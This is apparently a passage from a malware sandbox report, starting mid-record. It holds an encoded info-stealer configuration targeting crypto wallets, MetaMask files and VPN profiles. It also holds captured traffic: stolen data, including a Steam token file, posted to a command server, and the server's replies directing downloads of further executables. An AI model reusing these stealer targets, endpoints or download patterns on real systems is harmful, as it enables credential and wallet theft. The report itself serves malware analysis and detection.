REVTS3wlREVTS1RPUCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8REVTS3wlREVTS1RPUCVcfCp3YWxsZXQqLnBuZywqd2FsbGV0Ki5wZGYsKmJhY2t1cCoucG5nLCpiYWNrdXAqLnBkZiwqcmVjb3ZlcioucG5nLCpyZWNvdmVyKi5wZGYsKm1ldGFtYXNrKi4qLCpVVEMtLSouKnwxNTAwfDF8MXxET0NTfCVET0NVTUVOVFMlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8RE9DU3wlRE9DVU1FTlRTJVx8Ki50eHQsKi5kb2N4LCoueGxzeHw1fDF8MXxSRUN8JVJFQ0VOVCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8UkVDfCVSRUNFTlQlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXHwqLnhtbHwxNXwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXGJhY2t1cFx8Ki4qfDE1fDF8MXxTVUJMSU1FfCVBUFBEQVRBJVxTdWJsaW1lIFRleHQgM1xMb2NhbFxTZXNzaW9uLnN1YmxpbWVfc2Vzc2lvblx8Ki5zdWJsaW1lXyp8MTV8MXwxfFZQTl9DaXNjb1ZQTnwlUFJPR1JBTUZJTEVTJVxcLi5cXFByb2dyYW1EYXRhXFxDaXNjb1xDaXNjbyBBbnlDb25uZWN0IFNlY3VyZSBNb2JpbGl0eSBDbGllbnRcUHJvZmlsZVx8Ki54bWx8MTAwfDF8MHxWUE5fRm9ydGluZXR8JVBST0dSQU1GS
Apr 26, 2024 17:11:45.433650017 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAEGHIJEHJDHIDHIDAEH Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:11:45.813472033 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:11:45.904330015 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEBKKECBGIIJJKECGIJE Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:11:46.279783010 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:11:46.469265938 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFIIEBGCAAECBGCBGCBK Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:11:47.300452948 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:11:48.336899042 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAEC Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:11:48.714484930 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:11:48.967441082 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIEHJDHCBAEHJJJKKFID Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:11:49.338392019 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:11:49.471230984 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJDAFIEHIEGDHIDGDGHD Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:11:49.846769094 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:11:49.900708914 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGCFCFBKFCFCBGDGIEGH Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:11:50.284499884 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:11:50.432722092 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAEHIDAKECFIEBGDHJEB Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:11:50.817163944 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:11:52.548120975 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGCBAFCFIJJJECBGIIJK Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:11:52.927259922 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:11:53.145714045 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAAKEBGDAFHIIDHIIECF Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:11:53.518534899 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:11:53.595331907 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDAFBKECAKFCAAAKJDAK Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:11:53.981353998 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:11:54.143719912 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKJDGDGDHDGDBFIDHDBA Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:11:54.517410040 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:11:54.601077080 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHIIEHJKKECGCBFIIJDA Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:11:54.965996981 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:11:56.548243046 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBKJJEHCBAKFBFHJKFBK Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:11:56.923810005 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:11:57.419408083 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJEHJKJEBGHJJKEBGIEC Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:11:57.790127039 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:11:57.827543974 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEGHCFIDAKJEBGCAFBAE Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:11:58.202655077 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:11:58.244930029 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAECFIJDAAAKECBFCGHI Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:11:58.621195078 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:11:58.657705069 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAFIJKFHIJKKEBGCFBFH Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:11:59.036634922 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:11:59.114315987 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBAKEBAECGCBAAAAAEBA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:11:59.489234924 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:12:01.773256063 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGC Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:12:02.157918930 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:12:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:12:02.335850000 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGH Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:12:02.709539890 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:12:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:12:02.722524881 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKJEGDGIJECGCBGCGHDG Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:12:03.097733974 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:12:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:12:03.132009983 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKJDBAAAEHIEGCAKFHCG Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:12:03.509355068 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:12:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:12:03.551244020 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBFHDBKJEGHJJJKFIIJE Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:12:03.929410934 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:12:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:12:05.087568045 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIIEBGCBGIDHDGCAKJEB Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:12:05.469475031 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:12:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:12:05.692538977 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJEGDBGDBFIJKECBAKFB Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:12:06.072947025 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:12:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:12:06.082875013 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCG Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:12:06.470307112 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:12:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:12:06.593275070 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFIIJJJDGCBAAKFIIECG Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:12:06.967741013 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:12:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:12:06.996824026 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHI Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:12:07.373282909 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:12:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:12:07.384968996 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKJKFBKKECFHJKEBKEHI Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:12:07.760684013 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:12:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:12:09.316481113 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGCAAFBFBKFIDGDHJDBK Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:12:09.697319984 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:12:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:12:09.995369911 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGDHJEGIEBFHDGDGHDHI Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:12:10.372337103 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:12:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:12:10.380888939 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKKEGDGCGDAKEBFIJECG Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:12:10.762357950 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:12:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:12:10.809145927 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGCFIIEBKEGHJJJJJJDA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:12:11.185173035 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:12:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:12:11.205429077 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIEBAFCBKFIDGCAKKKFC Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:12:11.606456041 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:12:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:12:11.644434929 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHJDAAEGIDHDGCAAFCBA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:12:12.020330906 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:12:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:12:14.395850897 CEST	564	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAFBGHIDBGHJJKFHJDHC Host: 185.172.128.76 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 66 33 33 33 39 64 30 65 62 39 31 36 61 37 38 34 39 62 66 62 39 63 66 33 35 34 37 37 34 38 61 64 66 34 66 34 36 63 36 38 33 38 37 35 62 39 30 62 36 36 33 34 30 30 63 62 64 32 64 64 38 37 35 31 38 63 32 62 34 32 32 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 2d 2d 0d 0a Data Ascii: ------CAFBGHIDBGHJJKFHJDHCContent-Disposition: form-data; name="token"bf3339d0eb916a7849bfb9cf3547748adf4f46c683875b90b663400cbd2dd87518c2b422------CAFBGHIDBGHJJKFHJDHCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CAFBGHIDBGHJJKFHJDHCContent-Disposition: form-data; name="file"------CAFBGHIDBGHJJKFHJDHC--
Apr 26, 2024 17:12:14.776330948 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:12:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:12:15.096404076 CEST	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDAKEHIIDGDAAKECBFB Host: 185.172.128.76 Content-Length: 97119 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:12:15.886055946 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:12:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:12:18.744827986 CEST	469	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFCBFIJEHDHCBGDGDGCB Host: 185.172.128.76 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 46 49 4a 45 48 44 48 43 42 47 44 47 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 66 33 33 33 39 64 30 65 62 39 31 36 61 37 38 34 39 62 66 62 39 63 66 33 35 34 37 37 34 38 61 64 66 34 66 34 36 63 36 38 33 38 37 35 62 39 30 62 36 36 33 34 30 30 63 62 64 32 64 64 38 37 35 31 38 63 32 62 34 32 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 46 49 4a 45 48 44 48 43 42 47 44 47 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 68 65 72 37 68 34 38 72 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 46 49 4a 45 48 44 48 43 42 47 44 47 44 47 43 42 2d 2d 0d 0a Data Ascii: ------AFCBFIJEHDHCBGDGDGCBContent-Disposition: form-data; name="token"bf3339d0eb916a7849bfb9cf3547748adf4f46c683875b90b663400cbd2dd87518c2b422------AFCBFIJEHDHCBGDGDGCBContent-Disposition: form-data; name="message"her7h48r------AFCBFIJEHDHCBGDGDGCB--
Apr 26, 2024 17:12:19.117528915 CEST	223	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:12:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 52 Connection: keep-alive Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 78 4e 7a 49 75 4d 54 49 34 4c 6a 49 77 4d 79 39 30 61 57 74 30 62 32 73 75 5a 58 68 6c 66 44 42 38 4d 48 78 38 Data Ascii: aHR0cDovLzE4NS4xNzIuMTI4LjIwMy90aWt0b2suZXhlfDB8MHx8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49725	185.172.128.228	80	3808	C:\Users\user\AppData\Local\Temp\i1.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 17:11:21.835115910 CEST	185	OUT	GET /BroomSetup.exe HTTP/1.1 Host: 185.172.128.228 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 26, 2024 17:11:22.079334974 CEST	1289	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 15:11:21 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT ETag: "4a4030-613b1bf118700" Accept-Ranges: bytes Content-Length: 4866096 Content-Type: application/x-msdos-program Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 60 c3 4a 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 37 00 9c 4e 00 00 00 d0 3c 00 eb fe 0d 00 00 00 00 00 00 00 00 00 00 18 4a 00 30 28 00 00 00 30 38 00 84 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 38 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 be 37 00 e0 0b 00 00 00 00 38 00 d2 09 00 00 